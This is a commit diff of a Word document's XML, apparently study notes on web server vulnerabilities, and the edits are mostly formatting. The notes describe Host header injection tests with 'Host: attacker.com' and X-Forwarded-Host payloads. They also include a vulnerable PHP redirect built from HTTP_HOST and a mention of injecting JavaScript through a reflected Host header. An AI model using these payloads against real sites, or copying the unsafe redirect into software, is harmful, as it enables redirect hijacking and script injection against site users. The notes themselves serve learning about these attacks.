<commit_message>
word docx edited version
</commit_message>
<xml_diff>
--- a/docx_Files/7-web servers vulnerabilities &other attacks/web_servers_vulnerabilities.docx
+++ b/docx_Files/7-web servers vulnerabilities &other attacks/web_servers_vulnerabilities.docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:body>
     <w:p>
       <w:pPr>
@@ -450,7 +450,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>&lt;VirtualHost *&gt;</w:t>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>VirtualHost</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> *&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -469,13 +487,23 @@
           <w:u w:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ServerName </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ServerName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -512,6 +540,7 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Hyperlink"/>
@@ -521,7 +550,19 @@
           <w:szCs w:val="24"/>
           <w:u w:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">ServerAlias </w:t>
+        <w:t>ServerAlias</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:hyperlink r:id="rId6" w:history="1">
         <w:r>
@@ -550,13 +591,23 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>DocumentRoot /www/app1</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>DocumentRoot</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /www/app1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -578,7 +629,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>&lt;/VirtualHost&gt;</w:t>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>VirtualHost</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -600,7 +669,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>&lt;VirtualHost *&gt;</w:t>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>VirtualHost</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> *&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -619,13 +706,23 @@
           <w:u w:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ServerName </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ServerName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -662,6 +759,7 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Hyperlink"/>
@@ -671,7 +769,19 @@
           <w:szCs w:val="24"/>
           <w:u w:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">ServerAlias </w:t>
+        <w:t>ServerAlias</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:hyperlink r:id="rId8" w:history="1">
         <w:r>
@@ -700,13 +810,23 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>DocumentRoot /www/app2</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>DocumentRoot</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /www/app2</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -728,7 +848,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>&lt;/VirtualHost&gt;</w:t>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>VirtualHost</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -742,11 +880,19 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Ex : Any one requesting </w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>Ex :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Any one requesting </w:t>
       </w:r>
       <w:hyperlink r:id="rId9" w:history="1">
         <w:r>
@@ -1039,7 +1185,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Initial testing is as simple as supplying another domain (i.e. </w:t>
+        <w:t>Initial testing is as simple as supplying another domain (</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>i.e.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t> </w:t>
       </w:r>
       <w:hyperlink r:id="rId10" w:history="1">
         <w:r>
@@ -1408,7 +1572,30 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>First Method Briefly if we tampered or changed the real Host header to another website such as attacker.com if it redirects us to that site then its vulnerable to Host Header Attack</w:t>
+        <w:t xml:space="preserve">First Method </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="4"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:after="240"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Briefly if we tampered or changed the real Host header to another website such as attacker.com if it redirects us to that site then its vulnerable to Host Header Attack</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1431,6 +1618,37 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:t>Second</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Method </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="4"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:after="240"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>If the first method didn’t succeed, we can try to use X-Forwarded-Host header by changing the host header from realweb.com -&gt; attacker.com and X-Forwarded-Host to realweb.com</w:t>
       </w:r>
     </w:p>
@@ -1438,6 +1656,52 @@
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
+          <w:ilvl w:val="5"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:after="240"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Host: attacker.com</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="5"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:after="240"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>X-Forwarded-Host: realweb.com</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
           <w:ilvl w:val="4"/>
           <w:numId w:val="2"/>
         </w:numPr>
@@ -1454,7 +1718,47 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Host: attacker.com</w:t>
+        <w:t xml:space="preserve">If </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>it’s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> forwarded to the attacker site then its vulnerable to Host Header Injection </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:after="240"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Third Method</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1477,14 +1781,14 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>X-Forwarded-Host: realweb.com</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
+        <w:t xml:space="preserve">If this didn’t work, we can switch </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="5"/>
           <w:numId w:val="2"/>
         </w:numPr>
         <w:spacing w:after="240"/>
@@ -1500,30 +1804,14 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">If </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>it’s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> forwarded to the attacker site then its vulnerable to Host Header Injection </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
+        <w:t>Host: realweb.com</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="5"/>
           <w:numId w:val="2"/>
         </w:numPr>
         <w:spacing w:after="240"/>
@@ -1539,53 +1827,6 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">If this didn’t work, we can switch </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="4"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:spacing w:after="240"/>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Host: realweb.com</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="4"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:spacing w:after="240"/>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>X-Forwarded-Host: attacker.com</w:t>
       </w:r>
     </w:p>
@@ -1934,8 +2175,18 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>&lt;? Php</w:t>
-      </w:r>
+        <w:t xml:space="preserve">&lt;? </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1956,7 +2207,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>$host =”http://”.$_SERVER[‘HTTP_HOST’]</w:t>
+        <w:t xml:space="preserve">$host </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>=”http</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>://”.$_SERVER[‘HTTP_HOST’]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1978,8 +2247,28 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Echo $host.”/login.php” ;</w:t>
-      </w:r>
+        <w:t>Echo $host.”/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>login.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>” ;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2000,7 +2289,43 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Header (location: $host.”/login.php”) ; ?&gt;</w:t>
+        <w:t>Header (location: $host.”/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>login.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>) ;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ?&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2058,7 +2383,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>if the server return an error in the page that he can’t find this host or any error , the idea here is the host header value is been print on the screen so if we inject java scr</w:t>
+        <w:t xml:space="preserve">if the server return an error in the page that he can’t find this host or any </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>error ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the idea here is the host header value is been print on the screen so if we inject java scr</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2104,7 +2447,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Host Header : </w:t>
+        <w:t xml:space="preserve">Host </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Header :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:hyperlink w:history="1">
         <w:r>
@@ -2352,7 +2713,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
